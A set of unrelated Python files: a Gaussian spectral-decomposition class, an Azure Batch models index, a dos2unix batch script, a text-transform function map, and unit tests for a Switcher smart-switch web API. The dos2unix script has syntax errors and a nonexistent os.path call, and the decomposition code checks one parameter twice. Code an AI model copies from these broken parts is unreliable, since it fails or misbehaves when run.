if ((self.p["phase"] == "one") and (not alpha1_initial)) or (
(self.p["phase"] == "two")
and ((not alpha1_initial) or (not alpha1_initial))
):
print("Must choose initial guesses.")
print("e.g., train(alpha1_initial=1.0, alpha2_initial=100.)")
return
if not self.p["training_data"]:
print("Must first load training data.")
print('e.g., load_training_data("training_data.pickle")')
return
print("Training...")
(
self.p["alpha1"],
self.p["alpha2"],
self.p["training_results"],
) = gradient_descent.train(
alpha1_initial=alpha1_initial,
alpha2_initial=alpha2_initial,
training_data=self.p["training_data"],
phase=self.p["phase"],
SNR_thresh=self.p["SNR_thresh"],
SNR2_thresh=self.p["SNR2_thresh"],
# plot=plot,
eps=eps,
verbose=verbose,
mode=mode,
learning_rate=learning_rate,
MAD=MAD,
)
def decompose(self, xdata, ydata, edata):
""" Decompose a single spectrum using current parameters """
if (self.p["phase"] == "one") and (not self.p["alpha1"]):
print("phase = one, and alpha1 is unset")
return
if (self.p["phase"] == "two") and (
(not self.p["alpha1"]) or (not self.p["alpha2"])
):
print("phase = two, and either alpha1 or alpha2 is unset")
return
if self.p["mode"] != "conv":
a1 = 10 ** self.p["alpha1"]
a2 = 10 ** self.p["alpha2"] if self.p["phase"] == "two" else None
else:
a1 = self.p["alpha1"]
a2 = self.p["alpha2"] if self.p["phase"] == "two" else None
status, results = AGD_decomposer.AGD(
xdata,
ydata,
edata,
alpha1=a1,
alpha2=a2,
phase=self.p["phase"],
mode=self.p["mode"],
verbose=self.p["verbose"],
SNR_thresh=self.p["SNR_thresh"],
BLFrac=self.p["BLFrac"],
SNR2_thresh=self.p["SNR2_thresh"],
deblend=self.p["deblend"],
perform_final_fit=self.p["perform_final_fit"],
# plot=self.p["plot"],
)
return results
def decompose_double(self, xdata, ydata, xdata_em, ydata_em, edata, edata_em):
""" Decompose an absorption and emission pair simultaneously """
if (self.p["phase"] == "one") and (not self.p["alpha1"]):
print("phase = one, and alpha1 is unset")
return
if (self.p["phase"] == "two") and (
(not self.p["alpha1"]) or (not self.p["alpha2"])
):
print("phase = two, and either alpha1 or alpha2 is unset")
return
if self.p["mode"] != "conv":
a1 = 10 ** self.p["alpha1"]
a2 = 10 ** self.p["alpha2"] if self.p["phase"] == "two" else None
aem = 10 ** self.p["alpha_em"]
wgle = self.p["wiggle"]
dw = self.p["drop_width"]
mdv = self.p["min_dv"]
else:
a1 = self.p["alpha1"]
a2 = self.p["alpha2"] if self.p["phase"] == "two" else None
aem = self.p["alpha_em"]
status, results = AGD_decomposer.AGD_double(
xdata,
ydata,
xdata_em,
ydata_em,
edata,
edata_em,
# scale=self.p["scale"],
alpha1=a1,
alpha2=a2,
alpha_em=aem,
wiggle=self.p["wiggle"],
drop_width=self.p["drop_width"],
min_dv=self.p["min_dv"],
phase=self.p["phase"],
mode=self.p["mode"],
verbose=self.p["verbose"],
SNR_thresh=self.p["SNR_thresh"],
BLFrac=self.p["BLFrac"],
SNR2_thresh=self.p["SNR2_thresh"],
SNR_em=self.p["SNR_em"],
deblend=self.p["deblend"],
perform_final_fit=self.p["perform_final_fit"],
# plot=self.p["plot"],
)
return results
def status(self):
""" Return current values of parameters """
print("Current Parameters:")
print("---" * 10)
for index, key in enumerate(self.p):
if key in [
"data_list",
"errors",
"x_values",
"amplitudes",
"fwhms",
"means",
"amplitudes_fit",
"fwhms_fit",
"means_fit",
]:
print("len({0}) = {1}".format(key, len(self.p[key])))
else:
print(key, " = ", self.p[key])
def set(self, key, value):
if key in self.p:
self.p[key] = value
else:
print("Given key does not exist.")
def save_state(self, filename, clobber=False):
""" Save the current decomposer object, and all
associated parameters to a python pickle file."""
if os.path.isfile(filename):
if clobber:
os.remove(filename)
else:
print("File exists: ", filename)
return
pickle.dump(self, open(filename, "wb"))
def batch_decomposition(self, science_data_path, ilist=None):
""" Science data sould be AGD format
ilist is either None or an integer list"""
# Dump information to hard drive to allow multiprocessing
pickle.dump(
[self, science_data_path, ilist], open("batchdecomp_temp.pickle", "wb")
)
from . import batch_decomposition
batch_decomposition.init()
result_list = batch_decomposition.func()
print("SUCCESS")
new_keys = [
"index_fit",
"amplitudes_fit",
"fwhms_fit",
"means_fit",
"index_initial",
"amplitudes_initial",
"fwhms_initial",
"means_initial",
"amplitudes_fit_err",
"fwhms_fit_err",
"means_fit_err",
"best_fit_rchi2",
"amplitudes_fit_em",
"fwhms_fit_em",
"means_fit_em",
"means_fit_err_em",
"amplitudes_fit_err_em",
"fwhms_fit_err_em",
"fit_labels",
]
output_data = dict((key, []) for key in new_keys)
for i, result in enumerate(result_list):
# print(result.keys())
# print(result)
# Save best-fit parameters
ncomps = result["N_components"]
amps = result["best_fit_parameters"][0:ncomps] if ncomps > 0 else []
fwhms = (
result["best_fit_parameters"][ncomps : 2 * ncomps] if ncomps > 0 else []
)
offsets = (
result["best_fit_parameters"][2 * ncomps : 3 * ncomps]
if ncomps > 0
else []
)
output_data["amplitudes_fit"].append(amps)
output_data["fwhms_fit"].append(fwhms)
output_data["means_fit"].append(offsets)
output_data["index_fit"].append([i for j in range(ncomps)])
# Save initial guesses if something was found
ncomps_initial = len(result["initial_parameters"]) // 3
amps_initial = (
result["initial_parameters"][0:ncomps_initial]
if ncomps_initial > 0
else []
)
fwhms_initial = (
result["initial_parameters"][ncomps_initial : 2 * ncomps_initial]
if ncomps_initial > 0
else []
)
offsets_initial = (
result["initial_parameters"][2 * ncomps_initial : 3 * ncomps_initial]
if ncomps_initial > 0
else []
)
output_data["means_initial"].append(offsets_initial)
output_data["fwhms_initial"].append(fwhms_initial)
output_data["amplitudes_initial"].append(amps_initial)
output_data["index_initial"].append([i for j in range(ncomps_initial)])
# Final fit errors
rchi2 = [result["rchi2"]] if "rchi2" in result else None
amps_err = result["best_fit_errors"][0:ncomps] if ncomps_initial > 0 else []
fwhms_err = (
result["best_fit_errors"][ncomps : 2 * ncomps]
if ncomps_initial > 0
else []
)
offsets_err = (
result["best_fit_errors"][2 * ncomps : 3 * ncomps]
if ncomps_initial > 0
else []
)
output_data["best_fit_rchi2"].append(rchi2)
output_data["means_fit_err"].append(offsets_err)
output_data["fwhms_fit_err"].append(fwhms_err)
output_data["amplitudes_fit_err"].append(amps_err)
if self.p["alpha_em"] is not None:
ncomps = (
len(result["best_fit_parameters_em"]) // 3
if "best_fit_parameters_em" in result
else 0
)
# print("to save:", ncomps)
amps = (
result["best_fit_parameters_em"][0:ncomps]
if "best_fit_parameters_em" in result
else []
)
fwhms = (
result["best_fit_parameters_em"][ncomps : 2 * ncomps]
if "best_fit_parameters_em" in result
else []
)
offsets = (
result["best_fit_parameters_em"][2 * ncomps : 3 * ncomps]
if "best_fit_parameters_em" in result
else []
)
fit_labels = (
result["fit_labels"] if "best_fit_parameters_em" in result else []
)
output_data["amplitudes_fit_em"].append(amps)
output_data["fwhms_fit_em"].append(fwhms)
output_data["means_fit_em"].append(offsets)
output_data["fit_labels"].append(fit_labels)
amps_err = (
result["best_fit_errors_em"][0:ncomps]
if "best_fit_parameters_em" in result
else []
)
fwhms_err = (
result["best_fit_errors_em"][ncomps : 2 * ncomps]
if "best_fit_parameters_em" in result
else []
)
offsets_err = (
result["best_fit_errors_em"][2 * ncomps : 3 * ncomps]
if "best_fit_parameters_em" in result
else []
)
output_data["means_fit_err_em"].append(offsets_err)
output_data["fwhms_fit_err_em"].append(fwhms_err)
output_data["amplitudes_fit_err_em"].append(amps_err)
print("100 finished.%")
return output_data
# def plot_components(
# self,
# data,
# index,
# xlabel="x",
# ylabel="y",
# xlim=None,
# ylim=None,
# guesses=False,
# plot_true=False,
# ):
# # Extract info from data (must contain 'fit' categories)
# x = data["x_values"][index]
# y = data["data_list"][index]
#
# fwhms = data["fwhms_fit"][index]
# amps = data["amplitudes_fit"][index]
# means = data["means_fit"][index]
#
# fwhms_guess = data["fwhms_initial"][index]
# amps_guess = data["amplitudes_initial"][index]
# means_guess = data["means_initial"][index]
#
# ncomps = len(amps)
#
# if "amplitudes" in data:
# fwhms_true = data["fwhms"][index]
# amps_true = data["amplitudes"][index]
# means_true = data["means"][index]
#
# plt.plot(x, y, "-k", label="data", lw=1.5)
#
# # Plot fitted, components
# sum_fit = x * 0.0
# for i, amp in enumerate(amps):
# model = amp * np.exp(-(x - means[i]) ** 2 / 2.0 / (fwhms[i] / 2.355) ** 2)
# model_guess = amps_guess[i] * np.exp(
# -(x - means_guess[i]) ** 2 / 2.0 / (fwhms_guess[i] / 2.355) ** 2
# )
# sum_fit = sum_fit + model
# plt.plot(x, model, "-g", lw=0.5)
# if guesses:
# plt.plot(x, model_guess, "--g", lw=1)
# plt.xlabel(xlabel, fontsize=16)
# plt.ylabel(ylabel, fontsize=16)
# if xlim:
# plt.xlim(*xlim)
# if ylim:
# plt.ylim(*ylim)
# plt.plot(x, sum_fit, "-g", lw=1.0, label="Fit")
#
# # If available, plot True components
# sum_true = x * 0.0
# if ("amplitudes" in data) and plot_true:
# for i, amp in enumerate(amps_true):
# model_true = amps_true[i] * np.exp(
# -(x - means_true[i]) ** 2 / 2.0 / (fwhms_true[i] / 2.355) ** 2
# )
# sum_true = sum_true + model_true
# plt.plot(x, model_true, "-r", lw=0.5)
# plt.plot(x, sum_true, "-r", lw=1.0, label="True")
#
# plt.title("index = {0}, ncomps = {1}".format(index, ncomps), fontsize=16)
# plt.legend(loc=0)
# plt.legend(loc=1)
# plt.show()
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .auto_storage_base_properties import AutoStorageBaseProperties
from .key_vault_reference import KeyVaultReference
from .batch_account_create_parameters import BatchAccountCreateParameters
from .auto_storage_properties import AutoStorageProperties
from .batch_account import BatchAccount
from .batch_account_update_parameters import BatchAccountUpdateParameters
from .batch_account_regenerate_key_parameters import BatchAccountRegenerateKeyParameters
from .batch_account_keys import BatchAccountKeys
from .activate_application_package_parameters import ActivateApplicationPackageParameters
from .application_create_parameters import ApplicationCreateParameters
from .application_package import ApplicationPackage
from .application import Application
from .application_update_parameters import ApplicationUpdateParameters
from .batch_location_quota import BatchLocationQuota
from .resource import Resource
from .operation_display import OperationDisplay
from .operation import Operation
from .batch_account_paged import BatchAccountPaged
from .application_paged import ApplicationPaged
from .operation_paged import OperationPaged
from .batch_management_client_enums import (
PoolAllocationMode,
ProvisioningState,
AccountKeyType,
PackageState,
)
__all__ = [
'AutoStorageBaseProperties',
'KeyVaultReference',
'BatchAccountCreateParameters',
'AutoStorageProperties',
'BatchAccount',
'BatchAccountUpdateParameters',
'BatchAccountRegenerateKeyParameters',
'BatchAccountKeys',
'ActivateApplicationPackageParameters',
'ApplicationCreateParameters',
'ApplicationPackage',
'Application',
'ApplicationUpdateParameters',
'BatchLocationQuota',
'Resource',
'OperationDisplay',
'Operation',
'BatchAccountPaged',
'ApplicationPaged',
'OperationPaged',
'PoolAllocationMode',
'ProvisioningState',
'AccountKeyType',
'PackageState',
]
|
#!/usr/bin/env python
"""
dos2unix Batch Utility Script
=============================
First, use this for most things:
find . -name *.txt | xargs dos2unix
Second, this is a little smarter (might be faster), and I can control the
globbing a little better.
TODO
----
- implement some accounting (scanned, detected, fixed, directories, etc)
"""
import os
import re
import subprocess
__version__ = '0.0.0'
#=============================================================================
def d2u( path, recursive = False, verbose = False ):
"""
Convert DOS-style line endings to UNIX-style line endings as a batch.
"""
# list of files in path
files = os.listdir( path )
# list of files to fix (once we close their scanning handles)
fixes = []
# list of directories we encountered
dirs = []
# loop through each file
for filename in files:
# create a complete path to the file
file_path = path + os.path.sep + filename
# see if this is a directory
if os.path.is_dir( file_path ):
dirs.append( filename )
continue
# ensure filename matches list of patterns
# ZIH - implement list of patterns
match = re.match( r'.+\.txt$', filename )
if match is None:
continue
# check file for \r
with open( filename, 'rb' ) as fh:
chunk = fh.read( 256 )
if '\r' in chunk:
fixes.append( filename )
# fix all the files
for fix in fixes:
# convert this file in-place
result = dos2unix( ( path + os.path.sep + fix ), verbose = verbose )
# check result
if result != os.EX_OK
return result
# check for recursive being enabled
if recursive == True:
# do the same thing in each directory
for filename in dirs:
# the complete name to the directory
directory = path + os.path.sep + filename
# print verbose messages
if verbose == True:
print 'Entering: {}'.format( directory )
# batch process this directory
result = d2u( directory, recursive = True, verbose = verbose )
# check result
if result != os.EX_OK
return result
# everything seemed to work
return os.EX_OK
#=============================================================================
def dos2unix( path, verbose = False ):
"""
Front-end the dos2unix program in case we want to replace it later.
"""
if verbose == True:
print 'Converting: {}'.format( path )
return subprocess.call( [ 'dos2unix', path ] )
#=============================================================================
def _test():
"""
Executes a built-in unit test.
"""
# modules needed only for testing
import tempfile
import shutil
# create a directory in the system's temporary storage
test_dir = tempfile.mkdtemp()
# create a sub-directory to test recursion
sub_dir = test_dir + os.path.sep + 'sub'
os.mkdir( sub_dir )
# create a set of files to test scanning, detection, and fixing
files = [ 'd0.txt', 'd1.txt', 'm.txt', 'x.txt', 'u0.txt', 'u1.txt' ]
content = "this is a{1}test for {0}{1}line endings{1}{1}"
contents = {
'd' : [ 'DOS-style', '\r\n' ],
'u' : [ 'UNIX-style', '\n' ]
}
# local function for creating files
def make_test_files( prefix ):
for filename in files:
if filename[ 0 ] in contents:
path = prefix + os.path.sep + filename
with open( path, 'wb' ) as tfh:
tfh.write( content.format( *contents[ filename[ 0 ] ] ) )
# local function for testing the conversion
def check_test_files( prefix ):
for filename in files:
if filename[ 0 ] in contents:
path = prefix + os.path.sep + filename
with open( path, 'rb' ) as tfh:
actual = tfh.read()
if '\r' in actual:
print 'Failed to convert file {}.'.format( path )
# create a few files in the temp directory
make_test_files( test_dir )
# create a couple in the sub-directory
make_test_files( sub_dir )
#### ZIH - execute actual tests here
#### ZIH - also add a test for mixed line-endings
# delete all the test files and directories
shutil.rmtree( test_dir )
# return the result of testing
return os.EX_OK
#=============================================================================
def main( argv ):
"""
Script execution entry point
@param argv Arguments passed to the script
@return Exit code (0 = success)
"""
# imports when using this as a script
import argparse
# create and configure an argument parser
parser = argparse.ArgumentParser(
description = 'dos2unix Batch Utility Script',
add_help = False
)
parser.add_argument(
'-h',
'--help',
default = False,
help = 'Display this help message and exit.',
action = 'help'
)
parser.add_argument(
'-p',
'--print',
default = False,
help = 'Print conversions along the way.',
action = 'store_true'
)
parser.add_argument(
'-r',
'--recursive',
default = False,
help = 'Enables recursive scanning of sub-directories.',
action = 'store_true'
)
parser.add_argument(
'-t',
'--test',
default = False,
help = 'Execute the built-in unit test.',
action = 'store_true'
)
parser.add_argument(
'-v',
'--version',
default = False,
help = 'Display script version and exit.',
action = 'version',
version = __version__
)
parser.add_argument(
'path',
default = None,
nargs = '?',
help = 'Path to scan for line-ending conversion.'
)
# parse the arguments
args = parser.parse_args( argv[ 1 : ] )
# check for test request
if args.test == True:
return _test()
# check for normal path specification
if ( 'path' in args ) and ( args.path is not None ):
path = args.path
# default assumes we want to use current directory
else:
path = os.getcwd()
# call the d2u batch utility
status = d2u( path, recursive = args.recursive, verbose = args.print )
# return status
return status
#=============================================================================
if __name__ == "__main__":
import os
import sys
sys.exit( main( sys.argv ) )
|
from . import textakel
FUNCTIONS = {
"alphabetical": textakel.alphabetical,
"capitalize": textakel.capitalize,
"casefold": textakel.casefold,
"count_multiples": textakel.count_multiples,
"lower": textakel.lower,
"remove-consonant": textakel.remove_consonant,
"remove-digit": textakel.remove_digit,
"remove-letter": textakel.remove_letter,
"remove-punctuation": textakel.remove_punctuation,
"remove-space": textakel.remove_space,
"remove-vowel": textakel.remove_vowel,
"reverse": textakel.reverse,
"rot13": textakel.rot13,
"stretch": textakel.stretch,
"swap-pairs": textakel.swap_pairs,
"swap-umlaut": textakel.swap_umlaut,
"swapcase": textakel.swapcase,
"title": textakel.title,
"upper": textakel.upper
}
def get_function(name):
return FUNCTIONS[name]
def get_functions():
return list(FUNCTIONS.keys())
def takel(function_name, s):
function = get_function(function_name)
return function(s)
|
"""Unit tests for the Switcher WebAPI.
.. codeauthor:: Tomer Figenblat <tomer.figenblat@gmail.com>
"""
from aiohttp import ClientSession
from aioswitcher.api.messages import ResponseMessageType
from aioswitcher.consts import STATE_ON, WEEKDAY_TUP
from asynctest import MagicMock, patch
from bs4 import BeautifulSoup
import consts
import mappings
from helpers import get_local_ip_address, get_next_weekday
BASE_URL_FORMAT = (
"http://"
+ get_local_ip_address()
+ ":"
+ str(consts.TEST_SERVER_PORT)
+ "{}"
)
URL_GET_STATE = BASE_URL_FORMAT.format(mappings.URL_MAPPING_GET_STATE)
URL_TURN_ON = BASE_URL_FORMAT.format(mappings.URL_MAPPING_TURN_ON)
URL_TURN_OFF = BASE_URL_FORMAT.format(mappings.URL_MAPPING_TURN_OFF)
URL_GET_SCHEDULES = BASE_URL_FORMAT.format(mappings.URL_MAPPING_GET_SCHEDULES)
URL_SET_AUTO_SHUTDOWN = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_SET_AUTO_SHUTDOWN
)
URL_SET_DEVICE_NAME = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_SET_DEVICE_NAME
)
URL_ENABLE_SCHEDULE = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_ENABLE_SCHEDULE
)
URL_DISABLE_SCHEDULE = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_DISABLE_SCHEDULE
)
URL_DELETE_SCHEDULE = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_DELETE_SCHEDULE
)
URL_CREATE_SCHEDULE = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_CREATE_SCHEDULE
)
async def test_create_schedule_request(
create_schedule_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/create_schedule request.
Args:
create_schedule_response: fixture of mocked
``SwitcherV2CreateScheduleResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.create_schedule",
return_value=create_schedule_response,
):
async with ClientSession() as session:
selected_test_day = WEEKDAY_TUP[get_next_weekday()]
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "20",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "24",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Unknown start_hours, accepts 0 to 23."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_START_MINUTES: "60",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Unknown start_minutes, accepts 0 to 59."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "24",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Unknown stop_hours, accepts 0 to 23."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "60",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Unknown stop_minutes, accepts 0 to 59."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text == "Error: Argument start_hours is missing."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument start_minutes is missing."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text == "Error: Argument stop_hours is missing."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text == "Error: Argument stop_minutes is missing."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: ["Fakeday"],
consts.PARAM_START_HOURS: "20",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Unrecognized day requests, check documentation."
)
async with session.put(URL_CREATE_SCHEDULE) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert bs4scrap.text == "Error: Json body is missing."
create_schedule_response.msg_type = ResponseMessageType.STATE
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "20",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_delete_schedule_request(
delete_schedule_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/delete_schedule request.
Args:
delete_schedule_response: fixture of mocked
``SwitcherV2DeleteScheduleResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.delete_schedule",
return_value=delete_schedule_response,
):
async with ClientSession() as session:
async with session.delete(
URL_DELETE_SCHEDULE, params={consts.PARAM_SCHEDULE_ID: "2"}
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.delete(
URL_DELETE_SCHEDULE,
**{"json": {consts.PARAM_SCHEDULE_ID: "2"}},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.delete(
URL_DELETE_SCHEDULE, params={consts.PARAM_SCHEDULE_ID: "8"}
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument schedule_id accepts values 0-7."
)
async with session.delete(URL_DELETE_SCHEDULE) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text == "Error: Argument schedule_id is missing."
)
delete_schedule_response.msg_type = ResponseMessageType.STATE
async with session.delete(
URL_DELETE_SCHEDULE, params={consts.PARAM_SCHEDULE_ID: "2"}
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_disable_schedule_request(
disable_enable_schedule_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/disable_schedule request.
Args:
disable_enable_schedule_response: fixture of mocked
``SwitcherV2DisableEnableScheduleResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.disable_enable_schedule",
return_value=disable_enable_schedule_response,
):
async with ClientSession() as session:
async with session.patch(
URL_DISABLE_SCHEDULE,
params={
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.patch(
URL_DISABLE_SCHEDULE,
**{
"json": {
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
}
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.patch(
URL_DISABLE_SCHEDULE,
params={consts.PARAM_SCHEDULE_DATA: "not_24_len"},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument schedule_data is length is no 24."
)
async with session.patch(URL_DISABLE_SCHEDULE) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument schedule_data is missing."
)
disable_enable_schedule_response.msg_type = (
ResponseMessageType.STATE
)
async with session.patch(
URL_DISABLE_SCHEDULE,
params={
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
},
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_enable_schedule_request(
disable_enable_schedule_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/enable_schedule request.
Args:
disable_enable_schedule_response: fixture of mocked
``SwitcherV2DisableEnableScheduleResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.disable_enable_schedule",
return_value=disable_enable_schedule_response,
):
async with ClientSession() as session:
async with session.patch(
URL_ENABLE_SCHEDULE,
params={
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.patch(
URL_ENABLE_SCHEDULE,
**{
"json": {
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
}
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.patch(
URL_ENABLE_SCHEDULE,
params={consts.PARAM_SCHEDULE_DATA: "not_24_len"},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument schedule_data is length is no 24."
)
async with session.patch(URL_ENABLE_SCHEDULE) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument schedule_data is missing."
)
disable_enable_schedule_response.msg_type = (
ResponseMessageType.STATE
)
async with session.patch(
URL_ENABLE_SCHEDULE,
params={
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
},
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_get_schedules_request(
get_schedules_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/get_schedules request.
Args:
get_schedules_response: fixture of mocked
``SwitcherV2GetScheduleResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.get_schedules",
return_value=get_schedules_response,
):
async with ClientSession() as session:
async with session.get(URL_GET_SCHEDULES) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
assert body[consts.KEY_FOUND_SCHEDULES]
assert len(body[consts.KEY_SCHEDULES]) == 1
assert (
body[consts.KEY_SCHEDULES][0][consts.KEY_SCHEDULE_ID]
== consts.DUMMY_SCHEDULE_ID
)
assert body[consts.KEY_SCHEDULES][0][consts.KEY_ENABLED]
assert body[consts.KEY_SCHEDULES][0][consts.KEY_RECURRING]
assert len(body[consts.KEY_SCHEDULES][0][consts.KEY_DAYS]) == 1
assert (
body[consts.KEY_SCHEDULES][0][consts.KEY_DAYS][0]
== WEEKDAY_TUP[get_next_weekday()]
)
assert (
body[consts.KEY_SCHEDULES][0][consts.KEY_START_TIME]
== consts.DUMMY_START_TIME
)
assert (
body[consts.KEY_SCHEDULES][0][consts.KEY_END_TIME]
== consts.DUMMY_END_TIME
)
assert (
body[consts.KEY_SCHEDULES][0][consts.KEY_DURATION]
== consts.DUMMY_DURATION
)
get_schedules_response.successful = False
async with session.get(URL_GET_SCHEDULES) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
async def test_get_state_request(get_state_response: MagicMock) -> None:
"""Unit test-cases for /switcher/get_state request.
Args:
get_state_response: fixture of mocked
``SwitcherV2StateResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.get_state",
return_value=get_state_response,
) as patcher:
async with ClientSession() as session:
async with session.get(URL_GET_STATE) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
assert body[consts.KEY_STATE] == STATE_ON
assert body[consts.KEY_TIME_LEFT] == consts.DUMMY_TIME_LEFT
assert body[consts.KEY_TIME_ON] == consts.DUMMY_TIME_ON
